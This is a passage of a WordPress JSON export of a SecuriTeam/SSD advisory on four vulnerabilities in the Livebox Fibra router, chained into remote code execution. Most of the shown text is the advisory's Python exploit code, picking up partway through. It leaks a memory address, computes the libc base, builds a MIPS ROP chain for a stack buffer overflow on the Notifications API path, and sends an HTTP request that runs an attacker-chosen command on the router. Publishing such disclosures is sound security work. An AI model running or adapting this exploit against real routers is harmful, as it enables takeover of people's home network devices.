class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&gt;=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-st\">or<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">r<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">rfind<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8220;x76&#8221;<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&gt;=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-o\">:<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a4d56ec46cab185395022-98\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-p\"># the end of the address must be 0xdc and the start 0x77 or 0x76<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a4d56ec46cab185395022-99\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-v\">addressFound<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-t\">True<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a4d56ec46cab185395022-100\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-v\">end_leak<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">r<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">rfind<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8220;xf0&#8221;<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a4d56ec46cab185395022-101\"><span class=\"crayon-st\">else<\/span><span class=\"crayon-o\">:<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a4d56ec46cab185395022-102\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-i\">print<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;[-] Bad leaked address.&#8221;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a4d56ec46cab185395022-103\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-i\">print<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;[-] Restart your router and retry. DO NOT ENTER TO YOUR ROUTER WEBSITE BEFORE RUNNING ME!&#8221;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a4d56ec46cab185395022-104\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-e\">exit<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-cn\">1<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a4d56ec46cab185395022-105\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a4d56ec46cab185395022-106\"><span class=\"crayon-v\">LEAKED_ADDRESS<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">r<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-v\">end_leak<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-cn\">3<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-v\">end_leak<\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-cn\">1<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">encode<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8216;hex&#8217;<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a4d56ec46cab185395022-107\"><span class=\"crayon-v\">LEAKED_ADDRESS_LAST_BYTE<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-t\">int<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8216;0x&#8217;<\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">r<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-v\">end_leak<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-cn\">1<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-v\">end_leak<\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-cn\">1<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">encode<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8216;hex&#8217;<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-cn\">1<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">16<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a4d56ec46cab185395022-108\"><span class=\"crayon-v\">LEAKED_ADDRESS<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-t\">int<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">LEAKED_ADDRESS<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">16<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a4d56ec46cab185395022-109\"><span class=\"crayon-i\">print<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;[+] Leaked address: &#8220;<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">hex<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">LEAKED_ADDRESS<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">hex<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">LEAKED_ADDRESS_LAST_BYTE<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a4d56ec46cab185395022-110\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-5a4d56ec46cab185395022-111\"><span class=\"crayon-p\">########################################################<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a4d56ec46cab185395022-112\"><span class=\"crayon-p\"># Exploit Stack Buffer overflow on API path<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a4d56ec46cab185395022-113\"><span class=\"crayon-p\">########################################################<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a4d56ec46cab185395022-114\"><span class=\"crayon-v\">LIBC<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">LEAKED_ADDRESS<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-cn\">0x2C000<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">LEAKED_ADDRESS_LAST_BYTE<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-p\">#0x2C5D8 # 0x773DC # 0x774EC<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a4d56ec46cab185395022-115\"><span class=\"crayon-v\">EXEC<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">LIBC<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0x00058830<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a4d56ec46cab185395022-116\"><span class=\"crayon-v\">EXEC_COMM<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">LIBC<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0x00023fac<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-p\"># it is a function like &#8220;system&#8221; \ud83d\ude42<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a4d56ec46cab185395022-117\"><span class=\"crayon-i\">print<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;[+] LIBC address: &#8220;<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">hex<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">LIBC<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a4d56ec46cab185395022-118\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-5a4d56ec46cab185395022-119\"><span class=\"crayon-st\">if<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">hex<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">LIBC<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-cn\">2<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">!=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8217;00&#8217;<\/span><span class=\"crayon-o\">:<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a4d56ec46cab185395022-120\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-p\"># LIBC base must end with 00<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a4d56ec46cab185395022-121\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-i\">print<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;[-] Bad LIBC address.&#8221;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a4d56ec46cab185395022-122\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-i\">print<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;[-] Restart your router and retry. DO NOT ENTER TO YOUR ROUTER WEBSITE BEFORE RUNNING ME!&#8221;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a4d56ec46cab185395022-123\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-e\">exit<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-cn\">1<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a4d56ec46cab185395022-124\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-5a4d56ec46cab185395022-125\"><span class=\"crayon-p\"># 0x00049488: addiu s7, sp, 0x10; move a0, s7; move t9, s0; jalr t9;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a4d56ec46cab185395022-126\"><span class=\"crayon-v\">ROP1<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">LIBC<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0x00049488<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a4d56ec46cab185395022-127\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a4d56ec46cab185395022-128\"><span class=\"crayon-v\">payload<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8216;A&#8217;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">*<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">237<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a4d56ec46cab185395022-129\"><span class=\"crayon-v\">payload<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">p32<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">EXEC_COMM<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-p\"># s0<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a4d56ec46cab185395022-130\"><span class=\"crayon-v\">payload<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8216;s1s1&#8217;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-p\"># s1<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a4d56ec46cab185395022-131\"><span class=\"crayon-v\">payload<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8216;s2s2&#8217;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-p\"># s2<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a4d56ec46cab185395022-132\"><span class=\"crayon-v\">payload<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8216;s3s3&#8217;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-p\"># s3<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a4d56ec46cab185395022-133\"><span class=\"crayon-v\">payload<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">p32<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">ROP1<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-p\"># ra pc<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a4d56ec46cab185395022-134\"><span class=\"crayon-v\">payload<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8216;Z&#8217;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">*<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0x10<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a4d56ec46cab185395022-135\"><span class=\"crayon-v\">payload<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">cmd<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8216;;&#8217;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a4d56ec46cab185395022-136\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-5a4d56ec46cab185395022-137\"><span class=\"crayon-v\">s<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">autoconnect<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a4d56ec46cab185395022-138\"><span class=\"crayon-v\">s<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">sendall<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8221;<\/span><span class=\"crayon-s\">&#8216;GET \/API\/Services\/Notifications\/&#8217;<\/span><span class=\"crayon-s\">&#8221;<\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">payload<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-s\">&#8221;<\/span><span class=\"crayon-s\">&#8216; HTTP\/1.1<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a4d56ec46cab185395022-139\"><span class=\"crayon-s\">Host: 192.168.1.1<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a4d56ec46cab185395022-140\"><span class=\"crayon-s\">Content-Type: application\/json<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a4d56ec46cab185395022-141\"><span class=\"crayon-s\">Accept-Encoding: gzip, deflate<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a4d56ec46cab185395022-142\"><span class=\"crayon-s\">Connection: keep-alive<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a4d56ec46cab185395022-143\"><span class=\"crayon-s\">Proxy-Connection: keep-alive<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a4d56ec46cab185395022-144\"><span class=\"crayon-s\">Accept: *\/*<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a4d56ec46cab185395022-145\"><span class=\"crayon-s\">User-Agent: A<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a4d56ec46cab185395022-146\"><span class=\"crayon-s\">Accept-Language: es-ES;q=1<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a4d56ec46cab185395022-147\"><span class=\"crayon-s\">Authorization: Basic A&#8217;<\/span><span class=\"crayon-s\">&#8221;<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a4d56ec46cab185395022-148\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-5a4d56ec46cab185395022-149\"><span class=\"crayon-v\">s<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">close<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a4d56ec46cab185395022-150\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-5a4d56ec46cab185395022-151\"><span class=\"crayon-i\">print<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;[!] All exploited, the command should have been executed..&#8221;<\/span><\/div>\n<\/div>\n<\/td>\n<\/tr>\n<\/table><\/div>\n<\/p><\/div>\n<p>  <!-- [Format Time: 0.0158 seconds] -->  <\/p>\n<div class=\"printfriendly pf-alignleft\"><a href=\"#\" rel=\"nofollow\" onclick=\"window.print(); return false;\" class=\"noslimstat\" title=\"Printer Friendly, PDF &#038; Email\"><img decoding=\"async\" style=\"border:none;-webkit-box-shadow:none; box-shadow:none;\" src=\"https:\/\/cdn.printfriendly.com\/buttons\/printfriendly-button.png\" alt=\"Print Friendly, PDF &#038; Email\" \/><\/a><\/div>\n<\/div><\/div>\n<p><a href=\"https:\/\/blogs.securiteam.com\/index.php\/archives\/3585\" target=\"bwo\" >https:\/\/blogs.securiteam.com\/index.php\/feed<\/a><\/p>\n","protected":false},"excerpt":{"rendered":"<p><img decoding=\"async\" src=\"https:\/\/cdn.printfriendly.com\/buttons\/printfriendly-button.png\"\/><\/p>\n<p><strong>Credit to Author: SSD \/ Maor Schwartz| Date: Wed, 03 Jan 2018 06:33:51 +0000<\/strong><\/p>\n<p>Vulnerabilities Summary The following advisory describes four (4) vulnerabilities found in Livebox Fibra router version AR_LBFIBRA_sp-00.03.04.112S. It is possible to chain the vulnerabilities into remote code execution. The &#8220;Livebox Fibra&#8221; router is &#8220;manufactured by Arcadyan for Orange and Jazztel in Spain&#8221; The vulnerabilities found in Arcadyan routers are: Unauthenticated configuration information leak Hard-coded credentials Memory &#8230; <a href=\"https:\/\/blogs.securiteam.com\/index.php\/archives\/3585\" class=\"more-link\">Continue reading <span class=\"screen-reader-text\">SSD Advisory \u2013 Livebox Fibra (Orange Router) Multiple Vulnerabilities<\/span><\/a><\/p>\n","protected":false},"author":4,"featured_media":0,"comment_status":"open","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"colormag_page_container_layout":"default_layout","colormag_page_sidebar_layout":"default_layout","footnotes":""},"categories":[10643,10754],"tags":[17078,16041,12135,11682,10757],"class_list":["post-10993","post","type-post","status-publish","format-standard","hentry","category-independent","category-securiteam","tag-buff","tag-hard-coded-password","tag-information-disclosure","tag-remote-code-execution","tag-securiteam-secure-disclosure"],"_links":{"self":[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/posts\/10993","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/users\/4"}],"replies":[{"embeddable":true,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/comments?post=10993"}],"version-history":[{"count":0,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/posts\/10993\/revisions"}],"wp:attachment":[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/media?parent=10993"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/categories?post=10993"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/tags?post=10993"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}